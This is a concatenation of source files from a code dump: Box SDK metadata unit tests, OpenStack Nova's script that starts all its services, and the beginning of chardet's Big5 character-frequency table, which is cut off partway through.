from boxsdk.object.metadata import MetadataUpdate
@pytest.fixture
def metadata_response():
return {
'$id': 'c79896a0-a33f-11e3-a5e2-0800200c9a66',
'$type': 'properties',
'$parent': 'file_552345101',
'client_number': '820183',
'client_name': 'Biomedical Corp',
'case_reference': 'A83JAA',
'case_type': 'Employment Litigation',
'assigned_attorney': 'Francis Burke',
'case_status': 'in-progress',
}
@pytest.fixture(params=['enterprise', 'global'])
def metadata_scope(request):
return request.param
@pytest.fixture
def metadata_template():
return 'properties'
@pytest.mark.parametrize('success', [True, False])
def test_delete(mock_box_session, make_mock_box_request, test_file, metadata_scope, metadata_template, success):
# pylint:disable=redefined-outer-name
mock_box_session.delete.return_value, _ = make_mock_box_request(response_ok=success)
metadata = test_file.metadata(metadata_scope, metadata_template)
assert metadata.delete() is success
mock_box_session.delete.assert_called_once_with(metadata.get_url())
def test_create(
mock_box_session,
make_mock_box_request,
test_file,
metadata_scope,
metadata_template,
metadata_response,
):
# pylint:disable=redefined-outer-name
mock_box_session.post.return_value, _ = make_mock_box_request(response=metadata_response)
metadata = test_file.metadata(metadata_scope, metadata_template)
response = metadata.create(metadata_response)
assert response is metadata_response
mock_box_session.post.assert_called_once_with(
metadata.get_url(),
data=json.dumps(metadata_response),
headers={b'Content-Type': b'application/json'},
)
def test_get(
mock_box_session,
make_mock_box_request,
test_file,
metadata_scope,
metadata_template,
metadata_response,
):
# pylint:disable=redefined-outer-name
mock_box_session.get.return_value, _ = make_mock_box_request(response=metadata_response)
metadata = test_file.metadata(metadata_scope, metadata_template)
response = metadata.get()
assert response is metadata_response
mock_box_session.get.assert_called_once_with(metadata.get_url())
@pytest.fixture
def metadata_update():
update = MetadataUpdate()
update.add('path', 'value')
update.remove('path', 'value')
update.test('path', 'value')
update.update('path', 'value', 'value')
return update
def test_update(
mock_box_session,
make_mock_box_request,
test_file,
metadata_scope,
metadata_template,
metadata_response,
metadata_update,
):
# pylint:disable=redefined-outer-name
mock_box_session.put.return_value, _ = make_mock_box_request(response=metadata_response)
metadata = test_file.metadata(metadata_scope, metadata_template)
response = metadata.update(metadata_update)
assert response is metadata_response
mock_box_session.put.assert_called_once_with(
metadata.get_url(),
data=json.dumps(metadata_update.ops),
headers={b'Content-Type': b'application/json-patch+json'},
)
def test_start_update(test_file):
update = test_file.metadata().start_update()
assert isinstance(update, MetadataUpdate)
| apache-2.0 |
zzicewind/nova | nova/cmd/all.py | 61 | 3408 | # Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starter script for all nova services.
This script attempts to start all the nova services in one process. Each
service is started in its own greenthread. Please note that exceptions and
sys.exit() on the starting of a service are logged and the script will
continue attempting to launch the rest of the services.
"""
import sys
from oslo_config import cfg
from oslo_log import log as logging
from nova import config
from nova.i18n import _LE
from nova import objects
from nova.objectstore import s3server
from nova import service
from nova import utils
from nova.vnc import xvp_proxy
CONF = cfg.CONF
CONF.import_opt('manager', 'nova.conductor.api', group='conductor')
CONF.import_opt('topic', 'nova.conductor.api', group='conductor')
CONF.import_opt('enabled_apis', 'nova.service')
CONF.import_opt('enabled_ssl_apis', 'nova.service')
def main():
config.parse_args(sys.argv)
logging.setup(CONF, "nova")
LOG = logging.getLogger('nova.all')
utils.monkey_patch()
objects.register_all()
launcher = service.process_launcher()
# nova-api
for api in CONF.enabled_apis:
try:
should_use_ssl = api in CONF.enabled_ssl_apis
server = service.WSGIService(api, use_ssl=should_use_ssl)
launcher.launch_service(server, workers=server.workers or 1)
except (Exception, SystemExit):
LOG.exception(_LE('Failed to load %s-api'), api)
for mod in [s3server, xvp_proxy]:
try:
launcher.launch_service(mod.get_wsgi_server())
except (Exception, SystemExit):
LOG.exception(_LE('Failed to load %s'), mod.__name__)
for binary in ['nova-compute', 'nova-network', 'nova-scheduler',
'nova-cert', 'nova-conductor']:
# FIXME(sirp): Most service configs are defined in nova/service.py, but
# conductor has set a new precedent of storing these configs
# nova/<service>/api.py.
#
# We should update the existing services to use this new approach so we
# don't have to treat conductor differently here.
if binary == 'nova-conductor':
topic = CONF.conductor.topic
manager = CONF.conductor.manager
else:
topic = None
manager = None
try:
launcher.launch_service(service.Service.create(binary=binary,
topic=topic,
manager=manager))
except (Exception, SystemExit):
LOG.exception(_LE('Failed to load %s'), binary)
launcher.wait()
| apache-2.0 |
gitgitcode/myflask | venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/big5freq.py | 3133 | 82594 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
#Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
Big5CharToFreqOrder = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
